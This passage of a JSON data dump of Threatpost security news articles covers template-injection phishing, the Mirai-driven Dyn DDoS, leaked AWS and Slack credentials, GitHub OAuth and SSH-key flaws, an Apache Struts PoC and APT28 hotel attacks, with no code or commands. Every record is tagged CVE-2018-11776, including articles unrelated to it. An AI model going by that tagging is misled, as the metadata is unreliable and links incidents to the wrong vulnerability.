file from a particular IP,\u201d they noted. That connection was not via TCP 80 (often used for C2 communications), rather the SMB request was via TCP 445, a traditional Microsoft networking port.\n\nWithin the sandboxed VM \u201ca WebDAV connection was attempted over a SMB session when requesting the template.\u201d\n\nWebDAV is a Web-based Distributed Authoring and Versioning extension to the HTTP protocol that allows users to collaboratively edit and manage files on a remote server, according to [WebDAV Working Group](<http://www.webdav.org/>).\n\nUsing the WebDAV connection, the DOCX file requests a specific Relationship ID that is present in word/_rels/settings.xml.rels, or the XML instructions. According to researchers, the Relationship ID is identical to a phishing tool named Phishery, which uses the exact same ID in its template injection.\n\nPhishery is known as a credential harvester with a Word document template URL injector. According the [GitHub tool description](<https://github.com/ryhanson/phishery>), \u201cPhishery is a Simple SSL Enabled HTTP server with the primary purpose of phishing credentials via Basic Authentication.\u201d Once the target opens the Word document attachment sent in the phishing email, the template request reaches out to a Phishery server that triggers a dialogue box on the victim\u2019s computer requesting a Windows username and password.\n\nTalos researchers said Phishery was not used in the attacks it observed. It theorizes attacks may have used modified Phishery code or used the same Relationship ID to thwart analysis.\n\nIn the sample Talos examined, unlike with Phishery that prompted users for credentials, instead a template file is requested from a third-party server with no Basic Authentication prompt for credentials. \u201cSuch a prompt was not needed nor seen for samples requesting the template over SMB,\u201d they wrote.\n\nOnce the target opens the Word document a template request is made to a third-party server that initiates the download of a potentially rogue template. \u201cThe attachment instead tries to download a template file over an SMB connection so that the user\u2019s credentials can be silently harvested. In addition, this template file could also potentially be used to download other malicious payloads to the victim\u2019s computer,\u201d researchers said.\n\nTalos explains that the attacker\u2019s SMB server was down when it analyzed samples, making it impossible to determine the payloads (if any) that could have been dropped by the template being downloaded. \u201cForcing SMB requests to an external server has been a known security vulnerability for many years. Without further information it is impossible to conclude what the true scope of this attack was or what malicious payloads could have been involved.\u201d\n\nAccording to a _[New York Times](<https://www.nytimes.com/2017/07/06/technology/nuclear-plant-hack-report.html>)_ report of attacks against Wolf Creek Nuclear Operating Corporation included phishing lures with highly targeted email messages containing fake resumes for control engineering jobs.\n\nLate last month, the U.S. government warned critical infrastructure companies of hacking campaigns against nuclear and energy sector. \u201cHistorically, cyber actors have strategically targeted the energy sector with various goals ranging from cyber espionage to the ability to disrupt energy systems in the event of a hostile conflict,\u201d the report said.\n", "cvss3": {}, "published": "2017-07-10T14:34:03", "type": "threatpost", "title": "Energy, Nuclear Targeted with Template Injection Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2017-07-10T18:34:03", "id": "THREATPOST:6495B216452F8FF8CDF9A8F13AD41168", "href": "https://threatpost.com/energy-nuclear-targeted-with-template-injection-attacks/126727/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:54:34", "description": "**Update **DNS provider Dyn has confirmed two massive distributed denial of service attacks against its servers Friday impacting many of its customers including Twitter, Spotify and GitHub. The attacks came in two waves, one early Friday morning and a second just a few hours later.\n\n\u201cThis attack is mainly impacting U.S. East and is impacting Managed DNS customers in this region. Our engineers are continuing to work on mitigating this issue,\u201d according to a [statement by the company to customers](<https://www.dynstatus.com/>).\n\nAs of 5:30 p.m. EDT Dyn was still reporting it was investigating and mitigating several DDoS attacks against its domain name servers.\n\nIt\u2019s unclear how many sites have been impacted. For hours Friday morning many popular sites appeared to be experiencing outages or extremely sluggish performance including Twitter, Etsy, Github, SoundCloud, Spotify, Heroku, PagerDuty and Shopify. Dyn representatives would not confirm if each one of these outages was tied to the DDoS attack.\n\nBoth the Department of Homeland Security and the Federal Bureau of Investigation said they were monitoring the attacks. Gillian Christensen, acting deputy press secretary for DHS said in a statement: \u201cDHS and FBI are aware and are investigating all potential causes.\u201d\n\nManchester, New Hampshire-based Dyn said it first began monitoring the DDoS attack at 7:10 a.m. EDT Friday. The company said in a statement to customers:\n\n> \u201cStarting at 11:10 UTC on October 21th-Friday 2016 we began monitoring and mitigating a DDoS attack against our Dyn Managed DNS infrastructure. Some customers may experience increased DNS query latency and delayed zone propagation during this time. Updates will be posted as information becomes available.\u201d\n\nDyn said at 9:36 a.m. EDT, its services were restored and many of its affected customers, including Twitter, were back online. However, at 11:52 a.m. (EDT) Dyn updated its network status reporting an additional attack impacting its managed DNS infrastructure. Then 40 minutes later Dyn added the attacks had spread to its \u201cmanaged DNS advanced services with possible delays in monitoring.\u201d\n\nIt\u2019s unclear, at this time, the source of the DDoS attack, Dyn said.\n\nDale Drew, chief security officer for telecommunications firm Level 3 Communications said he had been monitoring the attack and the likely source were overseas hackers targeting U.S. cyber infrastructure. He added, [via a video statement posted to Periscope](<https://www.periscope.tv/w/1lPJqYjVMlZJb>), \u201cWe are seeing attacks coming from an Internet of Things botnet we have identified as Marai.\u201d\n\nSecurity firm Flashpoint also identified Marai as the likely culprit in the attack.\n\nThe Mirai malware continues to recruit vulnerable IoT devices into botnets [at a record pace](<https://threatpost.com/mirai-bots-more-than-double-since-source-code-release/121368/>), one that\u2019s only gone up since the source code for Mirai was made [public two weeks ago](<https://threatpost.com/source-code-released-for-mirai-ddos-malware/121039/>), according to Level 3.\n\nCraig Young, principle security researcher at Tripwire said the attack has telltale signs of an IoT-based DDoS attack similar to ones experienced by [Krebs on Security](<https://threatpost.com/iot-botnets-are-the-new-normal-of-ddos-attacks/121093/>) in September. In those attacks, hackers also used Mirai malware to compromise IoT devices to launch DDoS attacks.\n\n\u201cWe are seeing an increase in the number of high-intensity attacks that leverage compromised consumer DVRs and cameras. Without being able to analyze the source of Dyn\u2019s traffic it\u2019s impossible to know for sure. But what we are already seeing today, in terms IoT-based attacks, is the tip of the iceberg,\u201d Young said.\n\nRequests to Dyn for information on the source of the attacks have not been returned.\n\nYoung said that security experts have seen an increase in DDoS extortion attempts. However, he points out, many have been hoaxes and when companies didn\u2019t pay up nothing happened.\n\nForeScout CEO, Michael DeCesare said that attacks, such as the ones carried out Friday, are exasperated by the lack of security in IoT devices.\n\n\u201cThese attackers can now recruit an army of IoT devices to launch a wide scale DDoS attack due to the volume of these devices and their ease of infiltration,\u201d DeCesare said in a prepared statement regarding Friday\u2019s attacks.\n\n\u201cThe question corporations should be asking themselves is whether or not their devices are being exploited as part of these attacks. The solution starts with visibility \u2013 you cannot secure what you cannot see,\u201d he said.\n\n[![Level3 live outage map on Friday 9:50 AM \$ET\$](https://media.threatpost.com/wp-content/uploads/sites/103/2016/10/06232928/Threatpost_Level3_outage_map.jpg)](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/10/06232928/Threatpost_Level3_outage_map.jpg>)\n\nLevel3 live outage map on Friday 9:50 AM (EDT)\n\n[![screen-shot-2016-10-21-at-5-18-29-pm](https://media.threatpost.com/wp-content/uploads/sites/103/2016/10/06232859/Screen-Shot-2016-10-21-at-5.18.29-PM-1024x605.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/10/06232859/Screen-Shot-2016-10-21-at-5.18.29-PM.png>)\n\nLevel3 live outage map on Friday 5:20 PM (EDT)\n\n_This article was updated Oct. 21 at 5:30 p.m. with new information from the Department of Homeland Security, new information tying the attacks to Mirai malware and quotes from both Level 3 Communications and ForeScout. \n_\n", "cvss3": {}, "published": "2016-10-21T10:01:14", "type": "threatpost", "title": "DYN Confirms DDoS Attack Knocking Out Twitter, Spotify Other Major Sites", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2016-10-21T21:37:20", "id": "THREATPOST:0FC293825070B81036932BDB41D793B5", "href": "https://threatpost.com/dyn-confirms-ddos-attack-affecting-twitter-github-many-others/121438/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:59:06", "description": "Amazon Web Services is actively searching a number of sources, including code repositories and application stores, looking for exposed credentials that could put users\u2019 accounts and services at risk.\n\nA week ago, a security consultant in Australia said that as many as 10,000 secret Amazon Web Services keys could be found on Github through a simple search. And yesterday, a software developer reported receiving a notice from Amazon that his credentials were discovered on Google Play in an Android application he had built.\n\nRaj Bala printed a [copy of the notice](<http://blog.rajbala.com/post/81038397871/amazon-is-downloading-apps-from-google-play-and>) he received from Amazon pointing out that the app was not built in line with Amazon\u2019s recommended best practices because he had embedded his AWS Key ID (AKID) and AWS Secret Key in the app.\n\n\u201cThis exposure of your AWS credentials within a publicly available Android application could lead to unauthorized use of AWS services, associated excessive charges for your AWS account, and potentially unauthorized access to your data or the data of your application\u2019s users,\u201d Amazon told Baj.\n\nAmazon advises users who have inadvertently exposed their credentials to invalidate them and never distribute long-term AWS keys with an app. Instead, Amazon recommends requesting temporary security credentials.\n\nRich Mogull, founder of consultancy Securosis, said this is a big deal.\n\n\u201cAmazon is being proactive and scanning common sources of account credentials, and then notifying customers,\u201d Mogull said. \u201cThey don\u2019t have to do this, especially since it potentially reduces their income.\u201d\n\nMogull knows of what he speaks. Not long ago, he received a similar notice from Amazon regarding his AWS account, only his warning was a bit more dire\u2014his credentials had been exposed on Gitbub and someone had fired up unauthorized EC2 instances in his account.\n\nMogull wrote an [extensive description of the incident](<https://securosis.com/blog/my-500-cloud-security-screwup>) on the Securosis blog explaining how he was building a proof-of-concept for a conference presentation, storing it on Github, and was done in because a test file he was using against blocks of code contained his Access Key and Secret Key in a comment line.\n\nTurns out someone was using the additional 10 EC2 instances to do some Bitcoin mining and the incident cost Mogull $500 in accumulated charges.\n\nAmazon told an Australian publication that it will continue its efforts to seek out these exposed credentials on third-party sites such as Google Play and Github.\n\n\u201cTo help protect our customers, we operate continuous fraud monitoring processes and alert customers if we find unusual activity,\u201d _[iTnews](<http://www.itnews.com.au/News/381432,aws-admits-scanning-android-app-in-secret-key-hunt.aspx>) _quoted Amazon.\n\nSaid Mogull: \u201cIt isn\u2019t often we see a service provider protecting their customers from error by extending security beyond the provider\u2019s service itself. Very cool.\u201d\n", "cvss3": {}, "published": "2014-04-02T15:01:53", "type": "threatpost", "title": "Amazon Web Services Combing Third Parties for Credentials", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2014-04-04T19:14:11", "id": "THREATPOST:3DB647F38E79C8BDF5846F520D041C7C", "href": "https://threatpost.com/amazon-web-services-combing-third-parties-for-exposed-credentials/105217/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:55:10", "description": "Mike Mimoso and Chris Brook discuss the news of the week, including a password issue at Github, the xDedic marketplace, another Flash zero day, and how the poorly the FBI is doing with facial recognition software.\n\nDownload: [Threatpost_News_Wrap_June_17_2016.mp3](<http://traffic.libsyn.com/digitalunderground/Threatpost_News_Wrap_June_17_2016.mp3>)\n\nMusic by Chris Gonsalves\n\n[![itunessub](https://media.threatpost.com/wp-content/uploads/sites/103/2014/11/07011443/itunessub.jpg)](<https://itunes.apple.com/us/podcast/digital-underground-podcast/id315355232?mt=2>)\n", "cvss3": {}, "published": "2016-06-17T11:15:12", "type": "threatpost", "title": "On xDedic, a Flash Zero Day, Facial Recognition, and More", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2016-06-28T13:58:31", "id": "THREATPOST:962241D6EFDC7F82640BA9171D82D0B7", "href": "https://threatpost.com/threatpost-news-wrap-june-17-2016/118745/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:59:23", "description": "A Russian security researcher was able to take five low severity OAuth bugs in the coding site Github and string them together to create what he calls a \u201csimple but high severity exploit\u201d that gave him unfettered access to users\u2019 private repositories.\n\nBangkok-based researcher Egor Homakov \u2013 inspired to poke around the site after learning about its [new bug bounty program last month](<http://threatpost.com/github-launches-bug-bounty-program/103974>) \u2013 discussed the bugs in a blog entry [on his site](<http://homakov.blogspot.com/2014/02/how-i-hacked-github-again.html?m=1>) on Friday.\n\nGithub went on to fix the vulnerabilities \u201cin a timely fashion\u201d according to Homakov, who said he received a $4,000 reward, the highest Github has rewarded in the bounty program\u2019s short time, for his work.\n\nThe main problem lies in the site\u2019s Gist OAuth functionality. [Gists](<https://gist.github.com/>) are Pastebin-like repositories on Github that allow coders to share bits and pieces of their work with their contemporaries, and OAuth is an authentication protocol that can allow different entities, be it a web app or a mobile app, varying degrees of access to your account.\n\nThe first vulnerability in Github Homakov noticed was that he could bypass its [redirect_uri](<https://developer.github.com/v3/oauth/#redirect-urls>) validation by imputing a /../ path traversal. A path traversal attack allows access files and directories stored outside the web root folder to be accessed by manipulating the URL. In this case when the browser is redirected, Homakov found that he can control the HTTP parameter and trick it into not fully parsing the URL, letting him redirect to any Gist page he wants.\n\nIn fact Homakov found that whatever the client sent to get an authorization token, the provider would respond with a valid access_token, a vulnerability that could be used to compromise the log-in functionality on any site that uses it.\n\nThis \u2013 the second bug \u2013 could make it easy for an attacker to hijack the authorization code used for the redirect_uri and simply apply the leaked code on real client\u2019s callback to log in under the victim\u2019s account.\n\nHomakov discovered he could leverage both bugs to trick a user into following a link to get Github to leak a code sending request to him. Using something he\u2019s nicknamed an [Evolution of Open Redirect vulnerability](<http://homakov.blogspot.com/2014/01/evolution-of-open-redirect-vulnerability.html>) the code sending request is sent to an image request which Homakov can then use to then log into the victim\u2019s account and secure access to private gists.\n\nGists are static pages and can even allow users to embed their own images, or at least image code. In this situation there\u2019s a certain way the code can point to a suspicious URL and acquire the victim\u2019s code.\n\nOnce in, Homakov found that the client reveals the victim\u2019s actual OAuth access_token to the user agent, something he then was able to take advantage of and use to perform API calls on behalf of the victim.\n\nSince Gist falls under the Github umbrella, Homakov found the client approves any scope it\u2019s asked automatically. That includes allowing it to carry out specially crafted URLs that can leak code, giving him access to private GitHub repositories and Gists, \u201call in stealth-mode,\u201d because the github_token belongs to the Gist client. From here Homakov has the control of the affected Github user and their Gist account.\n\nHomakov is no stranger to rooting out Github bugs; he blogged about a bug involving the way the site pushes [public keys](<http://homakov.blogspot.com/2012/03/how-to.html>) in March 2012 and a problem with the way the site [handles cookies](<http://homakov.blogspot.com/2013/03/hacking-github-with-webkit.html>) last March.\n\nGithub kicked off its bug bounty program just over a week ago by promising to award anywhere from $100 to $5,000 to researchers who discover vulnerabilities in the site or other applications like its API or Gist. As Homakov\u2019s vulnerability involved both Github and Gist and fetched $4,000, it was clearly of concern to the site, with the way the vulnerabilities \u201c[fit so nicely together](<https://twitter.com/homakov/status/431685133570031617>),\u201d impressing Github.\n", "cvss3": {}, "published": "2014-02-11T10:53:58", "type": "threatpost", "title": "Five OAuth Bugs Lead to Github Hack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2014-02-13T22:01:16", "id": "THREATPOST:1F0994F898084346360FB7C6EFEC201C", "href": "https://threatpost.com/five-oauth-bugs-lead-to-github-hack/104178/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:55:11", "description": "Github is forcing a password reset on some of its users after it detected a number of successful intrusions into its repositories using credentials compromised in other breaches.\n\n\u201cThis appears to be the result of an attacker using lists of email addresses and passwords from other online services that have been compromised in the past, and trying them on GitHub accounts,\u201d GitHub said in an [advisory](<https://github.com/blog/2190-github-security-update-reused-password-attack>) published Thursday by Shawn Davenport, GitHub VP of security. \u201cWe immediately began investigating, and found that the attacker had been able to log in to a number of GitHub accounts.\u201d\n\nGitHub said it detected late Tuesday unauthorized attempts against a large number of GitHub accounts. It stressed that GitHub itself has not been compromised.\n\nIt warns users that in addition to the exposed credentials, some personal information may have been exposed as well as lists of accessible repositories and organizations.\n\n\u201cIf your account was impacted, we are in the process of contacting you directly with information about how to reset your password and restore access to your account,\u201d GitHub said.\n\nThe source of credentials used to attack GitHub accounts is unknown. ~~A request for comment from GitHub was not returned in time for publication~~ Github declined to comment beyond what is in its advisory.\n\nIn recent weeks, a number of massive online services including Twitter, VerticalScope, LinkedIn, Tumblr, VK.com and others have been informed that login credentials are for sale in bulk on the black market.\n\nAggregator site LeakedSource has been selling access to its database of breached credentials and more than 700 million credentials have been shared with the site.\n\n\u201cOur intentions are to bring data breaches to light no matter how old, inform consumers about what data is out there, inform consumers to use unique passwords and through our business API directly help companies determine if their users are at risk for account hijacking,\u201d LeakedSource told Threatpost.\n\n[VerticalScope](<http://www.verticalscope.com/about-us/security-update.html>), whose technology powers a number of popular online forums, is the most recent victim to come to light. More than 40 million credentials are believe to be implicated, stolen from sites running outdate vBulletin software that fails to implement HTTPS.\n\n\u201cWe believe that any potential breach is limited to usernames, userids, email addresses, ip addresses and encrypted passwords of our community users,\u201d VerticalScope said in its advisory.\n\nThe VerticalScope data was shared with LeakedSource, which analyzed it and said most of the passwords were salted using the outdated MD5 algorithm and easily crackable. LeakedSource published a top 10 list of the most common passwords and an unusual number of jibberish, complex passwords were included (18atcskd2w was used more on more than 91,000 accounts) indicating that they were likely generated by a bot and used to access the various forums.\n\nIn addition to VerticalScope, LeakedSource has analyzed tens of millions of credentials belonging to Twitter, iMesh and users of other large services whose credentials were stolen at some point.\n\nExperts, meanwhile, continue to caution against [password reuse](<https://threatpost.com/no-simple-fix-for-password-reuse/118536/>). As these breaches show, using the same password to access multiple sites is becoming fodder for attackers compromising one site to use that same access at other locations on the Internet.\n\n\u201cWe know that attackers will go for the weakest link and that is any user who reuses their passwords. It\u2019s a major problem,\u201d said Christopher Hadnagy, chief human hacker at security firm Social-Engineer.\n", "cvss3": {}, "published": "2016-06-17T11:01:55", "type": "threatpost", "title": "Breached Credentials Used to Access Github Repositories", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2016-06-28T13:58:36", "id": "THREATPOST:375A1BFC29F5B279C4D5E461D79CE4AA", "href": "https://threatpost.com/breached-credentials-used-to-access-github-repositories/118746/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-05-30T05:51:35", "description": "Proof-of-concept code found on the GitHub repository could allow attackers to easily take advantage of a recently identified vulnerability in the Apache Struts 2 framework. The vulnerability ([CVE-2018-11776](<https://access.redhat.com/security/cve/cve-2018-11776>)), [identified earlier this week](<https://threatpost.com/apache-struts-2-flaw-uncovered-more-critical-than-equifax-bug/136850/>), could allow an adversary to execute remote code on targeted systems.\n\nOn Friday, proof-of-concept code was [released](<https://github.com/jas502n/St2-057>) on GitHub along with a [Python script](<https://github.com/pr4jwal/quick-scripts/blob/master/s2-057.py>) that allows for easy exploitation, according to Allan Liska, senior security architect with Recorded Future.\n\n\u201c[We have] also detected chatter in a number of Chinese and Russian underground forums around the exploitation of this vulnerability,\u201d he [wrote in a post](<https://www.recordedfuture.com/apache-struts-vulnerability-github/>).\n\nThe bug, which impacts Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16, is tied to an improper validation of input data. The Apache Software Foundation [patched](<https://cwiki.apache.org/confluence/display/WW/S2-057>) the vulnerability for all supported versions of Struts 2. Users of Struts 2.3 are advised to upgrade to 2.3.35 and users of Struts 2.5 need to upgrade to 2.5.17.\n\nLiska said the Apache Struts 2 vulnerability is potentially even more damaging than a similar [2017 Apache Struts bug used to exploit Equifax](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>).\n\n\u201cUnlike that vulnerability, this one does not require any plug-ins to be present in order to exploit it, a simple well-crafted URL is enough to give an attacker access to a victim\u2019s Apache Struts installation and there is already exploit code on Github and underground forums are talking about how to exploit it. The worst part for many large organizations is that they may not even know they are vulnerable because Struts underpins a number of different systems including Oracle and Palo Alto,\u201d Liska said.\n\nThe fact that a patch is available to fix the vulnerability should give cold comfort to companies potentially impacted by the flaw.\n\n\u201cThe Equifax breach happened not because the vulnerability wasn\u2019t fixed, but because Equifax hadn\u2019t yet updated Struts to the latest version. If this is a true working PoC, then any company who hasn\u2019t had the time to update their software, will now be at even greater risk,\u201d said Oege de Moor, chief executive officer at Semmle.\n\nDe Moor said Semmle is not confirming whether the reported PoC is functional.\n\n\u201cIf it is [functioning], attackers now have a quicker way into the enterprise,\u201d de Moor wrote in a prepared statement Friday. \u201cThere is always a time lag between the announcement of a patch and a company updating its software. There are many reasons why companies can\u2019t update software like Struts immediately, as it is used for many business-critical operations. We aim to give companies a chance to stay safe by working with Apache Struts to make a coordinated disclosure.\u201d\n", "cvss3": {}, "published": "2018-08-24T22:07:17", "type": "threatpost", "title": "PoC Code Surfaces to Exploit Apache Struts 2 Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2018-08-24T22:07:17", "id": "THREATPOST:2F30C320035805DB537579B86877517E", "href": "https://threatpost.com/poc-code-surfaces-to-exploit-apache-struts-2-vulnerability/136921/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:57:28", "description": "The U.S. Army has released to open source an internal forensics analysis framework that the Army Research Lab has been using for some time.\n\nThe framework, known as Dshell, is a Python tool that runs on Linux and its designed to help analysts investigate compromises within their environments. The goal in open sourcing the framework is to encourage outside developers and analysts to develop and contribute their own modules, based on their experiences.\n\n\u201cOutside of government there are a wide variety of cyber threats that are similar to what we face here at ARL,\u201d William Glodek, Network Security branch chief at the Army Research Laboratory, said in a [statement](<http://www.army.mil/article/141734>).\n\n\u201cDshell can help facilitate the transition of knowledge and understanding to our partners in academia and industry who face the same problems.\u201d\n\nThe Dshell framework is available on [GitHub](<https://github.com/USArmyResearchLab/Dshell>), and Glodek said in his statement that he hopes that users in private industry and the academic community will find the framework useful and be able to contribute their own modules and help expand the framework\u2019s functionality.\n\n\u201cThe success of Dshell so far has been dependent on a limited group of motivated individuals within government. By next year it should be representative of a much larger group with much more diverse backgrounds to analyze cyber attacks that are common to us all,\u201d Glodek said.\n\nThe release of Dshell comes shortly after [Cisco released its own OpenSOC security analytics framework](<https://threatpost.com/cisco-releases-security-analytics-framework-to-open-source/109415>) on [GitHub](<https://opensoc.github.io/>) in November. That framework is designed specifically for large network environments and provides some anomaly detection and incident forensics capabilities.\n\n\u201cOpenSOC is a Big Data security analytics framework designed to consume and monitor network traffic and machine exhaust data of a data center. OpenSOC is extensible and is designed to work at a massive scale,\u201d the OpenSOC documentation says.\n", "cvss3": {}, "published": "2015-01-30T10:59:44", "type": "threatpost", "title": "Army Research Lab Releases Dshell Forensics Framework", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2015-02-03T21:08:15", "id": "THREATPOST:76BC692CF25A0009598D6BE4E626ABD9", "href": "https://threatpost.com/army-research-lab-releases-dshell-forensics-framework/110766/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:56:47", "description": "An audit of the SSH keys associated with more than a million GitHub accounts shows that some users have weak, easily factorable keys and many more are using keys that are still vulnerable to the Debian OpenSSL bug disclosed seven years ago.\n\nThe public SSH keys that users associate with their GitHub account are visible to other users, a feature that enables users to share those keys with others. Last December researcher Ben Cox decided to collect as many of those keys as he could and see what he could find out about them. He began the project on Dec. 27 and by Jan. 9 he had collected more than 1.3 million SSH keys.\n\n\u201cI took a stab at this in 2013 but found that too many people didn\u2019t use GitHub in SSH mode and thus had no keys set. This time however (with a new program that used the events api) I found that the majority of active users had some SSH keys in there,\u201d Cox said in a blog [post](<https://blog.benjojo.co.uk/post/auditing-github-users-keys>) detailing the project.\n\nAfter collecting the keys, Cox began analyzing them. One of the things he looked at was the strength of the key, and he discovered that seven of the keys in his set were just 512 bits, and two others were 256 bits. Those key lengths are short enough to be in the range of factorization on many modern machines.\n\n\u201c512 bit keys have been known to be factorable in less than 3 days. The main example of this is the Texas Instruments calculator firmware signing key that was broken, allowing the modding community to upload any firmware that they wanted,\u201d Cox said.\n\n\u201cI tried on my own to make a 256 bit key and factor it, and the process took less than 25 minutes from having the public SSH key to the factoring of primes (on a subpar processer by today\u2019s standards, and then a few more minutes to transform those back into a SSH key that I could log into systems with. This risk isn\u2019t only real if someone had gathered together top of the line mathematicians or supercomputers worth of power, the 256 bit key I factored was factored on a i5-2400 in 25 mins.\u201d\n\nThe bigger issue, however, is that Cox found what he calls a \u201cvery large amount\u201d of SSH keys in the set that were vulnerable to the [Debian OpenSSL bug](<https://lists.debian.org/debian-security-announce/2008/msg00152.html>) from 2008. That vulnerability existed in certain versions of Debian and resulted from the fact that the OpenSSL random number generator included in those versions was predictable. That means that cryptographic keys generated with vulnerable versions could be guessable. The bug affected SSH keys, VPN keys, and DNSSEC keys, among others.\n\nCox compared the list of keys he had gleaned from GitHub to a list of keys affected by the Debian flaw and found that some of the accounts using vulnerable keys had access to some large and sensitive GitHub repositories. Some of those repositories include Yandex, the Russian search provider, Spotify, the cryptographic libraries for Python, and Python\u2019s core.\n\nCox disclosed the problem to GitHub in early March and the vulnerable keys were revoked on May 5. The other weak and low-quality keys he discovered were revoked on June 1.\n", "cvss3": {}, "published": "2015-06-03T07:37:04", "type": "threatpost", "title": "Audit of GitHub SSH Keys Finds Many Still Vulnerable to Old Debian Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2015-06-04T15:34:07", "id": "THREATPOST:9F1389C4D97BAD7FDE2519A42E4594E2", "href": "https://threatpost.com/audit-of-github-ssh-keys-finds-many-still-vulnerable-to-old-debian-bug/113117/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:55:25", "description": "Popular collaboration and communication firm Slack rushed to plugged a security hole in its platform Thursday that was leaking some of its users\u2019 private chats and files for anyone to access.\n\nSlack, a leading tool used by companies to communicate internally, was alerted by security firm Detectify Labs who discovered Slack users were unwittingly sharing sensitive company information on the dev site GitHub.\n\nGitHub, another popular service used by the developer community to collaborate on projects, was unknowingly hosting hundreds of Slack bots that contained API information (or Slack tokens) that unintentionally gave third parties access to private Slack networks and data stored on them.\n\nSlack bots are created by companies to be used on their private Slack platform. They can serve either silly or serious purposes. For example, a Slack bot could be programmed to reboot servers by a user who simply types the request \u201cSlack bot, please reboot server\u201d. Another Slack bot request might be \u201cWhat\u2019s the weather for tomorrow?\u201d\n\nOver the years, thousands of Slack bots have been created by companies to carry out these conversational instructions. Hundreds of those developers decided to share their Slack bot programming code on sites such as GitHub. The idea is, other developers might want to reuse a useful Slack bot or modify the code so the Slack bot can do something new.\n\n\u201cThese developers were proud of their creation. They wanted to share their hard work with the rest of the developer community,\u201d said Rickard Carlsson, CEO of Detectify in an interview with Threatpost.\n\nThat\u2019s where developers ran into trouble. Unbeknownst to the developers sharing their Slack bots with GitHub was the fact they were also uploading their company\u2019s unique API key or token inside the Slack bot code. That meant a third-party could remove the Slack token and use it to hack into the Slack account of the person who originally created it.\n\nWhen Detectify searched for Slack tokens left behind on GitHub it discovered that those tokens could be used to access chats, files and private message data shared among Slack developer teams.\n\nAffected, Carlsson told Threatpost, were tokens belonging to individual users but also Fortune 500 companies, payment providers, multiple internet service providers and health care providers. In one case, Detectify reported it stumbled upon everything from \u201crenowned advertising agencies that want to show what they are doing internally. University classes at some of the world\u2019s best-known schools. Newspapers sharing their bots as part of stories.\u201d\n\nIn a [blog post outlining its discovery](<https://labs.detectify.com/2016/04/28/slack-bot-token-leakage-exposing-business-critical-information/>) Thursday, Detectify wrote, \u201cIn the worst case scenario, these tokens can leak production database credentials, source code, files with passwords and highly sensitive information.\u201d Detectify said it discovered the flaw earlier this month.\n\nAt first, Slack acknowledged the problem, but reminded researchers at Detectify that it\u2019s the users\u2019 responsibility to not share tokens and remove them when they are no longer needed. Slack has since updated its positions on tokens, telling Detectify \u201cWe\u2019re proactively looking for tokens ourselves now, and reaching out to customers to let them know when we\u2019ve disabled tokens and where we found them. We\u2019ll deactivate these in the next batch.\u201d\n\nSlack\u2019s email sent to its customers explaining the situation can be read online [via Detectify\u2019s website](<https://labs.detectify.com/wp-content/uploads/2016/04/Screen-Shot-2016-04-28-at-14.53.38.png>). In it the company said it would seeking out tokens it believed companies did not want to share intentionally, and deactivating them. \u201cTo help protect your team\u2019s information, we\u2019re taking the precautionary step of permanently disabling the affected tokens on your behalf,\u201d it wrote.\n\nIn a separate statement made to press Slack stated: \u201cSlack is clear and specific that tokens should be treated just like passwords. We warn developers when they generate a token never to share it with other users or applications. Our customers\u2019 security is of paramount importance to us, and we will continue to improve our documentation and communications to ensure that this message is urgently expressed.\u201d\n\nDetectify\u2019s last piece of advice: \u201cNever commit credentials inside code. Ever.\u201d\n", "cvss3": {}, "published": "2016-04-30T07:25:42", "type": "threatpost", "title": "Slack Plugs Token Security Hole", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2016-05-03T13:46:42", "id": "THREATPOST:BE0A86BAF05C9501D981BE19F3BB40AC", "href": "https://threatpost.com/slack-plugs-token-security-hole/117750/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:53:16", "description": "Russian-speaking cyberespionage group APT28, also known as Sofacy, is believed to be behind a series of attacks last month against travelers staying in hotels in Europe and the Middle East. APT28 notably used the NSA hacking tool EternalBlue as part of its scheme to steal credentials from business travelers, according to a [report](<https://www.fireeye.com/blog/threat-research/2017/08/apt28-targets-hospitality-sector.html>) released Friday by security firm FireEye.\n\nOne of the goals of the attack is to trick guests to download a malicious document masquerading as a hotel reservation form that, if opened and macros are enabled, installs a dropper file that ultimately downloads malware called Gamefish. Gamefish establishes a foothold in targeted systems as a way to install the open source tool called Responder, according to FireEye.\n\n\u201cOnce inside the network of a hospitality company, APT28 sought out machines that controlled both guest and internal Wi-Fi networks,\u201d wrote authors of the report Lindsay Smith and Benjamin Read, both researchers with FireEye\u2019s cyber espionage team.\n\n\u201cTo spread through the hospitality company\u2019s network, APT28 used a version of the EternalBlue SMB exploit. This was combined with the heavy use of py2exe to compile Python scripts. This is the first time we have seen APT28 incorporate this exploit into their intrusions,\u201d researchers said.\n\nFireEye said APT28\u2019s objective was to steal credentials from business travelers using hotel Wi-Fi networks, which the researchers said they did not observe. 